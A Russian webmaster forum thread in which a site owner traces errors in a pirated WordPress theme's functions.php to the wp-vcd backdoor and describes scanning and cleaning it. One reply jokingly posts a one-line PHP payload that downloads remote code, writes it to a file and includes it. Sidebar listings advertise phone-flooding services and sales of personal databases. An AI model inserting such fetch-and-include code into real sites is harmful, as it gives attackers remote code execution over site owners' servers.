Помогите исправить ошибку (Вордпресс)
Страницы: 1 2 След.
Помогите исправить ошибку (Вордпресс), Ошибка в functions.пхп
Собственно сабж. На сайте Вордпресс в файле functions.php появилась ошибка, вернее целый ряд ошибок вызванных одной smile:mad: проблемой:

"file_get_contents(http://www.название сайта*/code.php): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known"


Понятное дело, что ссылка ведёт на несуществующий ресурс, и долбит запросами сервер. В следствии чего тормоза и прочие неприятности. Как, и когда эта ссылка там появилась, понятия не имею. Озаботился поисками после явных проблем. Тест проводился плагином "Query Monitor" (см. скрин). Поочерёдное отключение немалой гирлянды плагинов к успеху не привело. Может уважаемое сообщество что то посоветует? Как безопасно решить проблему? Буду рад, если найдётся специалист (!), который ручками решит эту и ещё пару - тройку проблем на сайте. (в лич.)
Обнови тему принудительно
Цитата
Wordpresser пишет:
Обнови тему принудительно
Тему обновить не могу, потому, что в неё, в стили и проч, были внесены существенные изменения. Всё слетит в ноль. Нельзя.
Попробуйте подменить functions.php на файл из оригинальной темы из коробки.
Или закомментировать строки. То, что неизвестно откуда там эти ссылки - это плохо.

Ну и еще есть пара вариантов - но это в личку.
Поздравляю, вам очень повезло. Я серьезно.
Вы скачали из интернета тему с доступных источников, в котором УЖЕ были вшиты ссылки на выполнение левых скриптов с сайта http://yatots.com/. Частая фигня, люди думают, что добрые люди просто так выкладывают ворованные темы, поэтому покупать их не надо. в 70% платных тем, которые можно скачать нахаляву, вшит левый код. Проверенная десятки раз инфа.
В чем везение: пираты, которые вшили код, забыли продлить свой домен, и теперь вы знаете, что в файле functions.php лежит код, который вызывал левый код. А так бы работал бы ваш сайт и делал бы нечто свое, чего вы и знать то не хотите.
всех дел то зайти в этот файл и закомментить 110 127 и 143 строки, и тадам, проблема решена.
Услышь мой рев!
----------
И опыт, сын ошибок трудных, и гений, парадоксов друг.
Цитата
Охотник за хайпом пишет:
закомментить 110 127 и 143 строки
А по подробней можно код? Тоже джарида но проблем вроде не было
Цитата
Охотник за хайпом пишет:
Поздравляю, вам очень повезло. Я серьезно.
на самом деле, да, повезло. Но тут сейчас с мокрыми штанами надо шерстить ТСу ВСЁ, что сейчас на хосте, мало ли, что чужой скрипт где прописал...
Мы не можем похвастаться мудростью глаз
И умелыми жестами рук,
Нам не нужно все это, чтобы друг друга понять.
Сигареты в руках, чай на столе - так замыкается круг,
И вдруг нам становится страшно что-то менять.
Цитата
WGN пишет:
Цитата
Охотник за хайпом пишет:
закомментить 110 127 и 143 строки
А по подробней можно код? Тоже джарида но проблем вроде не было
так и у него проблем не было, пока пираты не облажались.
у всех по разному, прописать код можно куда угодно и он может быть каким угодно. все очень индивидуально. на каких то сайтах он просто в код страницы вставляет линейку скрытых ссылок на другие ресурсы (самый безобидный вариант, хотя есть еще безобидней - вообще ничего не делает, а лежит, ожидая команды). На каких то - рассылает спам. На каких то методично распихивает себя по куче разных файлов, чтоб потом бумкнуть сразу жетско, на каких то просто раз в несколько месяцев делает дефейс и прославляет тайских хакеров.
Все индивидуально и очень разнообразно.
В этом конкретном случае там строка типа 

$а = file_get_contents('http\\чототам.com');
Цитата
Охотник за хайпом пишет:
В этом конкретном случае там строка типа

$а = file_get_contents('http\\чототам.com');
пустите меня к армии ВордПресс! всего одну (в идеале)строчку надо добавить: 
Код
file_put_contents('неважно.php',file_get_contents(моё адресо));include('неважно.php');
Спасибо что откликнулись! smile:shout:

В то время, пока Вы собирались с мыслями, я не сидел сложа руки перелопатив гору форумов, старых и новых (!!) тем по проблеме.
Итак, сразу отвечу на вопросы:
1. Нет, в файле функций "из коробки" этих ссылок и кодов нет.
2. WGN - строки 110 127 и 143 это порядковые строки из functions.php
3. Просто закомментировать? Да, пожалуй так и сделаю, спасибо.

Но, всё оказалось хуже.

Плагином "Query Monitor" я последний раз пользовался давненько, при переезде на новый сервер. Тогда этих проблем не было, но и косяков явных на сайте не было. А ведь кипеж начался, когда участились тормоза и подвисания в админке,.. то есть совсем таки недавно. Всё как обычно, гром не грянет, мужик не перекрестится. smile:mad:


На форумах по теме таких криков немало. И советов массы.. просто МАССЫ!! но вся суть в одном. Вирусят, вирусили и будут нас вирусить, сучьи дети.


Короче из килотонн инфы я извлёк таки крупицу разума.
Ищем вирус. Ставим Ворддефенс и сканируем.

Получаем на выходе список косяков и подозрений, с рекомендациями типа, для нашего случая с функциями:

Filename: wp-content/themes/jarida/functions.php
File Type: Not a core, theme, or plugin file from wordpress.org.
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: $div_code_name="wp_vcd";

The infection type is: Backdoor:PHP/wp-vcd
Description: Backdoor used for backlink injection and other malicious activity.




Что в целом говорит, мол:
"Подробности. Этот файл, как установлено, установлен или изменен хакером для выполнения злонамеренных действий. Если вы знаете об этом файле, вы можете игнорировать его, чтобы исключить его из будущих сканирований. Текст, найденный в этом файле, который соответствует известному вредоносному файлу: $ div_code_name = "wp_vcd";"

Короче, вражина подсадил в папку wp-includes файлик - wp-vcd.php который находится в ядре WordPress, но не распространяется с этой версией WordPress. Обычно это связано с тем, что он оставлен из предыдущего обновления WordPress, но он также может быть добавлен другим плагином или вредоносным файлом, добавленным злоумышленником. (прим - это гугл переводчик).

Лечение - найти и просто удалить. Подсказали на форумах.


Плагин предложил "подлечить" проблему в один клик. Я вздрогнул.smile:D Знаем мы таких лекарей.

Поэтому на роль камикадзе я определил другой сайт, просто заготовку, который расположен на моём хостинге и что бы вы думали? Он тоже оказался инфицирован болезнями основного сайта. Стало быть вирус вовсю гуляет по серверу! Я кинулся проверять сателлиты.. увы, они кашляли теми же соплями.


Но ладно.. будем лечить. Пробую (по совету плагина) "подлечить" камикадзе.. Жму. ...
Бац! и.. он перевёл явную ошибку в раздел "Подозрительный элемент". Дышать стало легче, но проблема то осталась. К тому же, оказалось что вирус не один. И в Инклудах сидят ещё диверсанты. Но хорошо, что вражина обнаружен, буду теперь отлавливать и расстреливать по одному.


Второй скрин с подопытного сайта. На основном проблем побольше.


Так что джентльмены, рекомендую озаботиться безопасностью. Враг не дремлет, коварен и изобретателен ссук.
Цитата
Сергей Храбров пишет:
Спасибо что откликнулись! smile:shout:

В то время, пока Вы собирались с мыслями, я не сидел сложа руки перелопатив гору форумов, старых и новых (!!) тем по проблеме.
Итак, сразу отвечу на вопросы:
1. Нет, в файле функций "из коробки" этих ссылок и кодов нет.
2. WGN - строки 110 127 и 143 это порядковые строки из functions.php
3. Просто закомментировать? Да, пожалуй так и сделаю, спасибо.

Но, всё оказалось хуже.

Плагином "Query Monitor" я последний раз пользовался давненько, при переезде на новый сервер. Тогда этих проблем не было, но и косяков явных на сайте не было. А ведь кипеж начался, когда участились тормоза и подвисания в админке,.. то есть совсем таки недавно. Всё как обычно, гром не грянет, мужик не перекрестится. smile:mad:


На форумах по теме таких криков немало. И советов массы.. просто МАССЫ!! но вся суть в одном. Вирусят, вирусили и будут нас вирусить, сучьи дети.


Короче из килотонн инфы я извлёк таки крупицу разума.
Ищем вирус. Ставим Ворддефенс и сканируем.

Получаем на выходе список косяков и подозрений, с рекомендациями типа, для нашего случая с функциями:

Filename: wp-content/themes/jarida/functions.php
File Type: Not a core, theme, or plugin file from wordpress.org.
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: $div_code_name="wp_vcd";

The infection type is: Backdoor:pHP/wp-vcd
Description: Backdoor used for backlink injection and other malicious activity.



Что в целом говорит, мол:
"Подробности. Этот файл, как установлено, установлен или изменен хакером для выполнения злонамеренных действий. Если вы знаете об этом файле, вы можете игнорировать его, чтобы исключить его из будущих сканирований. Текст, найденный в этом файле, который соответствует известному вредоносному файлу: $ div_code_name = "wp_vcd";"

Короче, вражина подсадил в папку wp-includes файлик - wp-vcd.php который находится в ядре WordPress, но не распространяется с этой версией WordPress. Обычно это связано с тем, что он оставлен из предыдущего обновления WordPress, но он также может быть добавлен другим плагином или вредоносным файлом, добавленным злоумышленником. (прим - это гугл переводчик).

Лечение - найти и просто удалить. Подсказали на форумах.


Плагин предложил "подлечить" проблему в один клик. Я вздрогнул.smile:D Знаем мы таких лекарей.

Поэтому на роль камикадзе я определил другой сайт, просто заготовку, который расположен на моём хостинге и что бы вы думали? Он тоже оказался инфицирован болезнями основного сайта. Стало быть вирус вовсю гуляет по серверу! Я кинулся проверять сателлиты.. увы, они кашляли теми же соплями.


Но ладно.. будем лечить. Пробую (по совету плагина) "подлечить" камикадзе.. Жму. ...
Бац! и.. он перевёл явную ошибку в раздел "Подозрительный элемент". Дышать стало легче, но проблема то осталась. К тому же, оказалось что вирус не один. И в Инклудах сидят ещё диверсанты. Но хорошо, что вражина обнаружен, буду теперь отлавливать и расстреливать по одному.


Второй скрин с подопытного сайта. На основном проблем побольше.


Так что джентльмены, рекомендую озаботиться безопасностью. Враг не дремлет, коварен и изобретателен ссук.
мда уж, не повезло. Если есть возможность - изолируйте каждый сайт, и вычищайте злыдней по одному. Плавали - знаем, врагу не посоветую. С тех пор у меня все сайты на отдельных акках.
Цитата
WGN пишет:
А по подробней можно код? Тоже джарида но проблем вроде не было
Закомментировать строки в php файлах - это значит закомментировать. Так например:
Код
// file_get_contents (http://www.название сайта*/code.php) тут еще какой-то код в строке // nnnnnnnnnnnnnnnnnnn

Где символы // - это символы комментирования

nnn - это ваш необязательный комментарий

Символы // должны быть обязательно в начале строки не нужного кода и иметь отступ в 1-2 пробела.
Спасибо всем за ответы - таких проблем не оказалось, по крайней мере не выявил:)
Ну пользуясь случаем, чтобы новую тему не создавать. Уважаемые форумчане, я на Вордпрес совсем недавно. Подскажите какая страница там отвечает как страница материала и комментария (ну если судить по юкозу). Просто внутри материала надо дописать в титле h1 дополнение, но не могу найти где это вставить.
На самом деле, очень плохо, когда человек понятия не имеет, что и как происходит на его хосте. Сложностей много...smile:D Сами по себе работают какие-то плагины, что-то там делают, неизвестно как, неизвестно почему, могут быть ещё и с бомбой плагины smile:eek:, которые и так непонятно как и что делали, а теперь ещё и с внешим миром общаются без особого желания хозяина. smile:cool: Тяжела жизнь тех, кто влез в производственный процесс, но не хочет в него вникать, а тупо ест, что нашёл бесплатное. Современные менеджеры - они такие, да...
Страницы: 1 2 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
21:55 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
14:10 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг 
11:52 Партнерская программа Xoffers с прямыми офферами в вертикалях форекс, крипта и бинарные опционы. 
22:22 DreamCash.tl - заработок на онлайн-видео. До 95% отчислений, отличный конверт! 
20:00 Самозанятые смогут зарабатывать в рекламной сети VK 
19:24 XEvil - софт для разгадывания капчи. Бесплатная демо-версия. Привязка к SEO/SMM-софту. 
18:02 SharkBoss - партнёрская программа для монетизации ЛЮБЫХ видов трафика (включая спам). 
22:58 Продам обменник криптовалюты, а также новый обменник под ключ с обучением. Скидки на скрипты обменника 
17:22 Coin Click.cc - Быстрый и надежный обмен электронных валют в два клика 
14:44 Восстановление сайтов из Вебархива на Wordpress 
12:01 BestChange – обменивать электронную валюту можно быстро и выгодно 
20:59 Продам базу данных Банки/физы/миксы/БАДы 
20:23 ⭐Прием любых платежей для HIGH RISK проектов⭐ 
18:14 A-Parser 1.1 - продвинутый парсер поисковых систем, Suggest, PR, DMOZ, Whois, etc 
21:27 Точные прогнозы на футбол 
15:43 Заказать телефонный флуд. 
12:05 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
11:25 Флуд звонками 
11:40 Кто сделает прогон для адалт сайта? 
09:25 Добро пожаловать в цифровой мир... 
10:31 Видимо, похороны СУПРа уже прошли как-то по-тихому